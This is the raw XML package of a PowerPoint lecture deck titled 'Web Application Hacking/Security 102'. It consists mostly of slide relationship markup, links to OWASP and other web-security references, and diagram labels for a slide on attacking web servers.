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112.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/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77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90.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide97.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide56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39.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide105.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide9.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide102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62.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide91.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide95.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide65.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide69.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide1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3.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide106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81.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide88.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide11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64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Override PartName="/ppt/slides/slide110.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide15.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide107.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide59.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide7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55.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide63.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide37.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide92.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide103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6.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide109.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide96.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide24.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide104.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide68.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide85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98.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide18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49.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide108.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide7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87.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide23.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide86.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide6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84.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide99.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slide+xml"/>
  <Override PartName="/ppt/slides/slide101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00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4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6CBE348-5E4D-4942-A916-0CEAB57A75E7}">
  <a:tblStyle styleName="Table_0" styleId="{A6CBE348-5E4D-4942-A916-0CEAB57A75E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3232AB37-2CB4-478B-BFCD-03950E3BB5C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25EEAD53-7616-4F53-9E97-06A9C33E271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B3FFB6D0-1F6A-4CC2-B485-ACA40B8A52E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F556BCCD-AEAE-4393-A666-A8C3BA9C0C5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93.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId98"/><Relationship Target="slides/slide94.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId99"/><Relationship Target="slides/slide89.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId94"/><Relationship Target="slides/slide90.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId95"/><Relationship Target="slides/slide91.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId96"/><Relationship Target="slides/slide92.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId97"/><Relationship Target="slides/slide85.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId90"/><Relationship Target="slides/slide86.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId91"/><Relationship Target="slides/slide14.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId19"/><Relationship Target="slides/slide87.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId92"/><Relationship Target="slides/slide13.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId18"/><Relationship Target="slides/slide88.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId93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6.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId71"/><Relationship Target="slides/slide65.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId70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104.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId109"/><Relationship Target="slides/slide103.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId108"/><Relationship Target="slides/slide100.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId105"/><Relationship Target="slides/slide99.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId104"/><Relationship Target="slides/slide102.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId107"/><Relationship Target="slides/slide101.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId106"/><Relationship Target="slides/slide96.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId101"/><Relationship Target="slides/slide95.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId100"/><Relationship Target="slides/slide98.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId103"/><Relationship Target="slides/slide97.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId102"/><Relationship Target="slides/slide75.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId80"/><Relationship Target="slides/slide77.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId82"/><Relationship Target="slides/slide76.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId81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81.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId86"/><Relationship Target="slides/slide80.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId85"/><Relationship Target="slides/slide83.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId88"/><Relationship Target="slides/slide82.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId87"/><Relationship Target="slides/slide84.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId89"/><Relationship Target="slides/slide113.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId118"/><Relationship Target="slides/slide112.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId117"/><Relationship Target="slides/slide111.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId116"/><Relationship Target="slides/slide110.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId115"/><Relationship Target="slides/slide53.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId58"/><Relationship Target="slides/slide114.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId119"/><Relationship Target="slides/slide54.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId59"/><Relationship Target="slides/slide105.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId110"/><Relationship Target="slides/slide109.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId114"/><Relationship Target="slides/slide108.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId113"/><Relationship Target="slides/slide107.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId112"/><Relationship Target="slides/slide106.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId1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55.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Id="rId6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1" name="Shape 1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2" name="Shape 1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3" name="Shape 1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7" name="Shape 1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8" name="Shape 1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9" name="Shape 1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3" name="Shape 1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4" name="Shape 1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5" name="Shape 1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9" name="Shape 1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0" name="Shape 1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1" name="Shape 1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7" name="Shape 1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8" name="Shape 1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9" name="Shape 1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3" name="Shape 1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4" name="Shape 1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5" name="Shape 1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9" name="Shape 1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0" name="Shape 1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1" name="Shape 1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5" name="Shape 1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6" name="Shape 1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7" name="Shape 1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3" name="Shape 1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4" name="Shape 1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5" name="Shape 1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9" name="Shape 1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0" name="Shape 1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6" name="Shape 1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7" name="Shape 1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8" name="Shape 1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4" name="Shape 1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5" name="Shape 11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6" name="Shape 1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0" name="Shape 1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1" name="Shape 1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2" name="Shape 1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6" name="Shape 1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7" name="Shape 1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8" name="Shape 1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2" name="Shape 1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3" name="Shape 1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4" name="Shape 1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9" name="Shape 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7" name="Shape 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3" name="Shape 5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5" name="Shape 5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3" name="Shape 5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5" name="Shape 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1" name="Shape 5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8" name="Shape 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6" name="Shape 5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6" name="Shape 6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8" name="Shape 6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5" name="Shape 6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1" name="Shape 6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8" name="Shape 6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1" name="Shape 6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7" name="Shape 6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3" name="Shape 6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9" name="Shape 6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5" name="Shape 6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1" name="Shape 6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7" name="Shape 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3" name="Shape 6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0" name="Shape 7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6" name="Shape 7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3" name="Shape 7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9" name="Shape 7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5" name="Shape 7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1" name="Shape 7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8" name="Shape 7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5" name="Shape 7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1" name="Shape 7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7" name="Shape 7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3" name="Shape 7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9" name="Shape 7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7" name="Shape 7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8" name="Shape 7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4" name="Shape 7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1" name="Shape 7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8" name="Shape 7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4" name="Shape 8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0" name="Shape 8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6" name="Shape 8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2" name="Shape 8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9" name="Shape 8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0" name="Shape 8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5" name="Shape 8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2" name="Shape 8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9" name="Shape 8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0" name="Shape 8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5" name="Shape 8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6" name="Shape 8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1" name="Shape 8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2" name="Shape 8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7" name="Shape 8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8" name="Shape 8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3" name="Shape 8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4" name="Shape 8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9" name="Shape 8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5" name="Shape 8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6" name="Shape 8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9" name="Shape 9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0" name="Shape 9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1" name="Shape 9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7" name="Shape 9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0" name="Shape 9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6" name="Shape 9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4" name="Shape 9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5" name="Shape 9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6" name="Shape 9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7" name="Shape 9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8" name="Shape 9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4" name="Shape 10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5" name="Shape 10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2" name="Shape 10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3" name="Shape 10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4" name="Shape 10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0" name="Shape 10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6" name="Shape 10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7" name="Shape 10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8" name="Shape 10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5" name="Shape 10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6" name="Shape 10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7" name="Shape 10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5" name="Shape 10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6" name="Shape 10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7" name="Shape 10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6" name="Shape 10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7" name="Shape 10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8" name="Shape 10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9" name="Shape 10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4" name="Shape 10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5" name="Shape 10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0.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide10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101.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide10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2.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide10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owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide103.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide10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owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide104.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide10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jpg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide105.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide10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l.dropbox.com/u/14820738/SQLi.pdf" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId4"/><Relationship Target="http://intellavis.com/blog/?p=498" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId3"/><Relationship Target="https://www.pentesterlab.com/from_sqli_to_shell.html" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId6"/><Relationship Target="https://www.owasp.org/index.php/Main_Page" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId5"/><Relationship Target="http://sqlninja.sourceforge.net/sqlninja-howto.html" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId7"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide106.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide10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7.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide10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esources.infosecinstitute.com/w3af-tutorial/" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide108.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide10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png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide109.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide10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10.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide1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1.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide1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0.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide112.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide1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3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide1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4.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide1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owasp.org/index.php/Main_Page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https://www.pentesterlab.com/from_sqli_to_shell.html" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External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http://www.w3schools.com/tags/ref_urlencode.asp" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External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.org/International/articles/definitions-characters/" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External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owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId3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ha.ckers.org/sqlinjection/" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId4"/><Relationship Target="http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId3"/><Relationship Target="http://www.veracode.com/security/sql-injection" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId5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http://www.ubergizmo.com/2014/01/chrome-exploit-can-allow-hackers-to-listen-in-even-after-a-tab-is-closed/" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId3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-US/docs/DOM/window.parent" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId4"/><Relationship Target="https://developer.mozilla.org/en-US/docs/DOM/HTMLIFrameElement" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId3"/><Relationship Target="https://developer.mozilla.org/en-US/docs/DOM/window.opener" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId6"/><Relationship Target="https://developer.mozilla.org/en-US/docs/DOM/window.open" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId5"/><Relationship Target="http://www.whatwg.org/specs/web-apps/current-work/multipage/history.html#security-location" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External" Id="rId8"/><Relationship Target="http://www.whatwg.org/specs/web-apps/current-work/multipage/browsers.html#security-window" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" TargetMode="External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2.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide8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3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide8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4.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide8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4"/><Relationship Target="../media/image17.jpg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide85.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide8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4"/><Relationship Target="../media/image21.jpg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide86.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide8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4"/><Relationship Target="../media/image17.jpg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide87.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide8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4"/><Relationship Target="../media/image26.jpg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide88.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide8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89.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide8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4"/><Relationship Target="../media/image17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90.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide9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4"/><Relationship Target="../media/image21.jpg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/><Relationship Target="../media/image26.jpg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId5"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide91.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide9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4"/><Relationship Target="../media/image17.jpg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide92.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide9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4"/><Relationship Target="../media/image17.jpg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide93.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide9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jpg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId4"/><Relationship Target="../media/image27.jpg" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide94.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide9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5.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide9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96.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide9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97.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide9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4"/><Relationship Target="../media/image28.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide98.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide9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4"/><Relationship Target="../media/image28.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Id="rId3"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide99.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Target="../notesSlides/notesSlide9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4"/><Relationship Target="../media/image17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/>
              <a:t>Web Application Hacking/Security 102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Spring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Attacking the Server(s)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254" name="Shape 254"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3756338" x="7924507"/>
            <a:ext cy="1143299" cx="1175399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255" name="Shape 255"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off y="3988142" x="4811468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256" name="Shape 256"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4968357" x="6610621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Authentication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57" name="Shape 257"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4968357" x="7916629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Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="Shape 258"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2787096" x="7836664"/>
            <a:ext cy="927300" cx="12632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Web</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1200" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr sz="1200" lang="en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59" name="Shape 259"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3434605" x="6125575"/>
            <a:ext cy="999432" cx="1343249"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartTerminator">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accen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Web Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="260" name="Shape 260"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="259" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3244621" x="2458075"/>
            <a:ext cy="689700" cx="36675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y="3539498" x="2199961"/>
            <a:ext cy="566699" cx="395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2" name="Shape 262"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="259" idx="3"/>
            <a:endCxn id="254" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3934321" x="7468824"/>
            <a:ext cy="393600" cx="45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63" name="Shape 263"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="258" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off y="3250746" x="7412764"/>
            <a:ext cy="391800" cx="42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64" name="Shape 264"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4433998" x="7324863"/>
            <a:ext cy="559799" cx="66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65" name="Shape 265"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="259" idx="2"/>
            <a:endCxn id="256" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4434037" x="6797199"/>
            <a:ext cy="534300" cx="40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66" name="Shape 266"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2671819" x="7021869"/>
            <a:ext cy="618300" cx="6227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AJAX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="Shape 267"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2671819" x="6172864"/>
            <a:ext cy="618300" cx="744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FLASH</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1000" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr sz="1000" lang="en"/>
              <a:t>/ FLEX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="268" name="Shape 268"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5097051" x="5665543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APPLETS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
